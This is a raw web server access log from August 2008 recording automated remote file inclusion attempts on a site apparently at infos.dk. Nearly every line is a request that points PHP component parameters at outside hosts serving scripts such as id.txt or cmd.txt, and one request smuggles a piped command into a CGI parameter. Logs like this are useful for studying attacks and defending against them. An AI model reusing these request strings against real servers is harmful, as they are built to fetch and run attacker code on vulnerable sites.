62.76.116.20 - - [02/Aug/2008:07:57:01 +0200] "GET /err-r_log-www.infos.dk//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
62.76.116.20 - - [02/Aug/2008:07:57:01 +0200] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
216.75.35.118 - - [02/Aug/2008:07:57:19 +0200] "GET //mambots/content/josowbot.content.php?mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
129.142.67.13 - - [02/Aug/2008:08:26:26 +0200] "GET /err-r_log-www.infos.dk//administrator/index.php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://warsector.ru/access2006.log??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
129.142.67.13 - - [02/Aug/2008:08:26:27 +0200] "GET //administrator/index.php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://warsector.ru/access2006.log??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
129.142.67.13 - - [02/Aug/2008:08:32:23 +0200] "GET //administrator/index.php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://warsector.ru/access2006.log??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
125.24.86.179 - - [02/Aug/2008:09:06:56 +0200] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
82.165.253.72 - - [02/Aug/2008:09:09:14 +0200] "GET /err-r_log-www.infos.dk/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
82.165.253.72 - - [02/Aug/2008:09:09:14 +0200] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
64.38.20.210 - - [02/Aug/2008:09:11:00 +0200] "GET /err-r_log-www.infos.dk//components/errors.php?error=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
64.38.20.210 - - [02/Aug/2008:09:11:01 +0200] "GET //components/errors.php?error=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
67.18.29.218 - - [02/Aug/2008:09:15:21 +0200] "GET /err-r_log-www.infos.dk//?path%5Bdocroot%5D=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
67.18.29.218 - - [02/Aug/2008:09:15:22 +0200] "GET //?path%5Bdocroot%5D=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 200 3425 "-" "libwww-perl/5.805"
59.126.46.141 - - [02/Aug/2008:09:22:10 +0200] "GET /errors.php?error=http://saltgum.com/test.txt? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
82.165.253.72 - - [02/Aug/2008:09:29:21 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://dieguin.t35.com/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
82.165.253.72 - - [02/Aug/2008:09:29:21 +0200] "GET /errors.php?error=http://dieguin.t35.com/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
200.201.8.9 - - [02/Aug/2008:09:48:34 +0200] "GET ///vwar/backup/errors.php?error=http://neu_2.lasrv-1.de/web/%20/.../ident.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
200.201.8.9 - - [02/Aug/2008:09:48:34 +0200] "GET /err-r_log-www.infos.dk%20///vwar/backup/errors.php?error=http://neu_2.lasrv-1.de/web/%20/.../ident.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
194.126.158.17 - - [02/Aug/2008:09:53:15 +0200] "GET /err-r_log-www.infos.dk/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
194.126.158.17 - - [02/Aug/2008:09:53:15 +0200] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
80.67.24.32 - - [02/Aug/2008:09:56:13 +0200] "GET /err-r_log-www.infos.dk//include/lib.inc.php?site_path=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 302 214 "-" "libwww-perl/5.808"
80.67.24.32 - - [02/Aug/2008:09:56:20 +0200] "GET //include/lib.inc.php?site_path=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 302 214 "-" "libwww-perl/5.808"
64.22.89.194 - - [02/Aug/2008:09:59:53 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
64.22.89.194 - - [02/Aug/2008:09:59:53 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
72.232.71.106 - - [02/Aug/2008:10:00:10 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
72.232.71.106 - - [02/Aug/2008:10:00:12 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
72.232.71.106 - - [02/Aug/2008:10:00:17 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
85.159.91.143 - - [02/Aug/2008:10:00:38 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
67.18.29.218 - - [02/Aug/2008:10:07:08 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
67.18.29.218 - - [02/Aug/2008:10:07:08 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
64.22.89.194 - - [02/Aug/2008:10:09:46 +0200] "GET /err-r_log-www.infos.dk//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
64.22.89.194 - - [02/Aug/2008:10:09:46 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
64.22.89.194 - - [02/Aug/2008:10:09:46 +0200] "GET /err-r_log-www.infos.dk//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
64.22.89.194 - - [02/Aug/2008:10:09:46 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
72.232.71.106 - - [02/Aug/2008:10:11:02 +0200] "GET /err-r_log-www.infos.dk//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
72.232.71.106 - - [02/Aug/2008:10:11:02 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
72.232.71.106 - - [02/Aug/2008:10:11:10 +0200] "GET /err-r_log-www.infos.dk//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
72.232.71.106 - - [02/Aug/2008:10:11:10 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
72.232.71.106 - - [02/Aug/2008:10:11:18 +0200] "GET /err-r_log-www.infos.dk//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
72.232.71.106 - - [02/Aug/2008:10:11:18 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
85.159.91.143 - - [02/Aug/2008:10:12:26 +0200] "GET /err-r_log-www.infos.dk//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
85.159.91.143 - - [02/Aug/2008:10:12:26 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
200.131.208.21 - - [02/Aug/2008:10:13:28 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:10:13:28 +0200] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:10:13:28 +0200] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:10:13:28 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
125.24.86.179 - - [02/Aug/2008:10:15:13 +0200] "GET /err-r_log-www.infos.dk/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
125.24.86.179 - - [02/Aug/2008:10:15:18 +0200] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
125.24.86.179 - - [02/Aug/2008:10:15:23 +0200] "GET /err-r_log-www.infos.dk/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
67.18.29.218 - - [02/Aug/2008:10:15:28 +0200] "GET /err-r_log-www.infos.dk%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
125.24.86.179 - - [02/Aug/2008:10:15:29 +0200] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
62.76.116.20 - - [02/Aug/2008:10:28:16 +0200] "GET /err-r_log-www.infos.dk//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
62.76.116.20 - - [02/Aug/2008:10:28:16 +0200] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
125.24.86.179 - - [02/Aug/2008:10:34:00 +0200] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
74.53.152.210 - - [02/Aug/2008:10:38:23 +0200] "GET /err-r_log-www.infos.dk//skin/zero_vote/error.php?dir=http://www.geocities.com/sak4w/taf/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
74.53.152.210 - - [02/Aug/2008:10:38:23 +0200] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/sak4w/taf/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
202.181.206.50 - - [02/Aug/2008:10:39:11 +0200] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
202.181.206.50 - - [02/Aug/2008:10:39:12 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
203.150.231.79 - - [02/Aug/2008:10:40:33 +0200] "GET //components/errors.php?error=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
203.150.231.79 - - [02/Aug/2008:10:40:33 +0200] "GET /err-r_log-www.infos.dk//components/errors.php?error=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:10:44:49 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:10:44:49 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:10:44:49 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:10:44:50 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
72.47.213.57 - - [02/Aug/2008:10:53:13 +0200] "GET /errors.php?error=http://manetu.de/cms_demo//contenido/applets/src/.%20/.bash/errors.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
72.47.213.57 - - [02/Aug/2008:10:53:16 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://manetu.de/cms_demo//contenido/applets/src/.%20/.bash/errors.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
203.146.102.38 - - [02/Aug/2008:11:01:08 +0200] "GET /err-r_log-www.infos.dk//errors.php?error=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
203.146.102.38 - - [02/Aug/2008:11:01:09 +0200] "GET //errors.php?error=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
85.214.32.233 - - [02/Aug/2008:11:02:06 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ies-nigeria.com/hezid2.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
85.214.32.233 - - [02/Aug/2008:11:02:07 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ies-nigeria.com/hezid2.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
203.146.102.38 - - [02/Aug/2008:11:02:28 +0200] "GET /err-r_log-www.infos.dk//errors.php?error=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
203.146.102.38 - - [02/Aug/2008:11:02:29 +0200] "GET //errors.php?error=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
203.146.102.38 - - [02/Aug/2008:11:02:57 +0200] "GET //errors.php?error=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
85.214.32.233 - - [02/Aug/2008:11:06:26 +0200] "GET /err-r_log-www.infos.dk//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ies-nigeria.com/hezid2.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
85.214.32.233 - - [02/Aug/2008:11:06:27 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ies-nigeria.com/hezid2.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
200.131.208.21 - - [02/Aug/2008:11:06:54 +0200] "GET /err-r_log-www.infos.dk//include.php?path[docroot]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:11:06:54 +0200] "GET //include.php?path[docroot]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:11:06:57 +0200] "GET /err-r_log-www.infos.dk//include.php?path[docroot]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:11:06:57 +0200] "GET //include.php?path[docroot]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
212.40.34.8 - - [02/Aug/2008:11:08:31 +0200] "GET /index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
202.181.206.50 - - [02/Aug/2008:11:11:57 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
202.181.206.50 - - [02/Aug/2008:11:11:57 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
203.22.204.92 - - [02/Aug/2008:11:13:00 +0200] "GET //newspublish/include.php?path%5Bdocroot%5D=%20http://www.grupslactancia.info/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.76"
201.48.251.238 - - [02/Aug/2008:11:19:16 +0200] "GET /err-r_log-www.infos.dk//include.php?path[docroot]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
201.48.251.238 - - [02/Aug/2008:11:19:16 +0200] "GET //include.php?path[docroot]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
202.181.206.50 - - [02/Aug/2008:11:22:07 +0200] "GET /err-r_log-www.infos.dk%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
213.191.144.10 - - [02/Aug/2008:11:27:01 +0200] "GET //components/errors.php?error=http://l4ntak.freehoxt.com/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
125.24.86.179 - - [02/Aug/2008:11:29:17 +0200] "GET /err-r_log-www.infos.dk/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
125.24.86.179 - - [02/Aug/2008:11:29:19 +0200] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
213.33.84.163 - - [02/Aug/2008:11:30:20 +0200] "GET /err-r_log-www.infos.dk//?path%5Bdocroot%5D=http://theimageguide.com/tmp/cache/readme.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
213.33.84.163 - - [02/Aug/2008:11:30:20 +0200] "GET //?path%5Bdocroot%5D=http://theimageguide.com/tmp/cache/readme.txt???? HTTP/1.1" 200 3425 "-" "libwww-perl/5.805"
77.235.44.201 - - [02/Aug/2008:11:31:00 +0200] "GET /err-r_log-www.infos.dk//bbs.lib.inc.php?site_path=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.814"
77.235.44.201 - - [02/Aug/2008:11:31:01 +0200] "GET //bbs.lib.inc.php?site_path=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.814"
77.235.44.201 - - [02/Aug/2008:11:31:03 +0200] "GET /err-r_log-www.infos.dk//bbs.lib.inc.php?site_path=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.814"
77.235.44.201 - - [02/Aug/2008:11:31:03 +0200] "GET //bbs.lib.inc.php?site_path=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.814"
98.129.33.59 - - [02/Aug/2008:11:31:10 +0200] "GET //?path%5Bdocroot%5D=http://theimageguide.com/tmp/cache/arab.txt? HTTP/1.1" 200 3425 "-" "libwww-perl/5.805"
77.235.44.201 - - [02/Aug/2008:11:31:57 +0200] "GET //bbs.lib.inc.php?site_path=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.814"
85.234.133.173 - - [02/Aug/2008:11:32:11 +0200] "GET /err-r_log-www.infos.dk//cgi-bin/site/session.cgi?page=links.html%7Ccathttp://www.delta.helloweb.eu/albania1.txt????? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
85.234.133.173 - - [02/Aug/2008:11:32:12 +0200] "GET //cgi-bin/site/session.cgi?page=links.html%7Ccathttp://www.delta.helloweb.eu/albania1.txt????? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
66.79.163.142 - - [02/Aug/2008:11:32:27 +0200] "GET //?path%5Bdocroot%5D=http://theimageguide.com/tmp/cache/id2.txt?? HTTP/1.1" 200 3425 "-" "libwww-perl/5.811"
204.10.38.130 - - [02/Aug/2008:11:33:06 +0200] "GET /err-r_log-www.infos.dk/index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
204.10.38.130 - - [02/Aug/2008:11:33:06 +0200] "GET /index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
216.180.241.37 - - [02/Aug/2008:11:36:31 +0200] "GET /index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
124.32.6.244 - - [02/Aug/2008:11:40:25 +0200] "GET /index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
89.111.176.64 - - [02/Aug/2008:11:43:57 +0200] "GET /index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
203.146.102.38 - - [02/Aug/2008:11:45:03 +0200] "GET /err-r_log-www.infos.dk//bbs.lib.inc.php?site_path=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
203.146.102.38 - - [02/Aug/2008:11:45:06 +0200] "GET //bbs.lib.inc.php?site_path=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
203.130.242.135 - - [02/Aug/2008:11:46:03 +0200] "GET //plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.apnic.net/index.html? HTTP/1.0" 302 202 "-" "Mozilla/5.0"
69.72.153.58 - - [02/Aug/2008:11:46:49 +0200] "GET //bbs.lib.inc.php?site_path=http://incarnate-network.eu//images/smilies/osid6.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.813"
69.72.153.58 - - [02/Aug/2008:11:46:49 +0200] "GET /err-r_log-www.infos.dk%20//bbs.lib.inc.php?site_path=http://incarnate-network.eu//images/smilies/osid6.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.813"
203.146.102.38 - - [02/Aug/2008:11:48:07 +0200] "GET //bbs.lib.inc.php?site_path=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
203.146.102.38 - - [02/Aug/2008:11:50:01 +0200] "GET /err-r_log-www.infos.dk//bbs.lib.inc.php?site_path=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
203.146.102.38 - - [02/Aug/2008:11:50:03 +0200] "GET //bbs.lib.inc.php?site_path=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
89.111.176.84 - - [02/Aug/2008:11:56:01 +0200] "GET /err-r_log-www.infos.dk/index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
89.111.176.84 - - [02/Aug/2008:11:56:02 +0200] "GET /index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
74.52.139.226 - - [02/Aug/2008:11:56:32 +0200] "GET /err-r_log-www.infos.dk/index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
74.52.139.226 - - [02/Aug/2008:11:56:32 +0200] "GET /index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
213.191.144.10 - - [02/Aug/2008:12:04:15 +0200] "GET /err-r_log-www.infos.dk//components/errors.php?error=http://l4ntak.freehoxt.com/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
216.180.241.37 - - [02/Aug/2008:12:05:01 +0200] "GET /err-r_log-www.infos.dk/index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
91.121.143.183 - - [02/Aug/2008:12:05:08 +0200] "GET /err-r_log-www.infos.dk//?path%5Bdocroot%5D=http://theimageguide.com/tmp/cache/readme.txt%0D?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
91.121.143.183 - - [02/Aug/2008:12:05:08 +0200] "GET //?path%5Bdocroot%5D=http://theimageguide.com/tmp/cache/readme.txt%0D?? HTTP/1.1" 200 3425 "-" "libwww-perl/5.803"
212.117.89.191 - - [02/Aug/2008:12:05:49 +0200] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.freexhost.info/users/gardhenal/mic22.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
62.169.0.50 - - [02/Aug/2008:12:13:34 +0200] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dantman.com/.../rid??? HTTP/1.1" 302 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
124.32.6.244 - - [02/Aug/2008:12:17:58 +0200] "GET /err-r_log-www.infos.dk/index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
89.111.176.64 - - [02/Aug/2008:12:18:53 +0200] "GET /err-r_log-www.infos.dk/index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
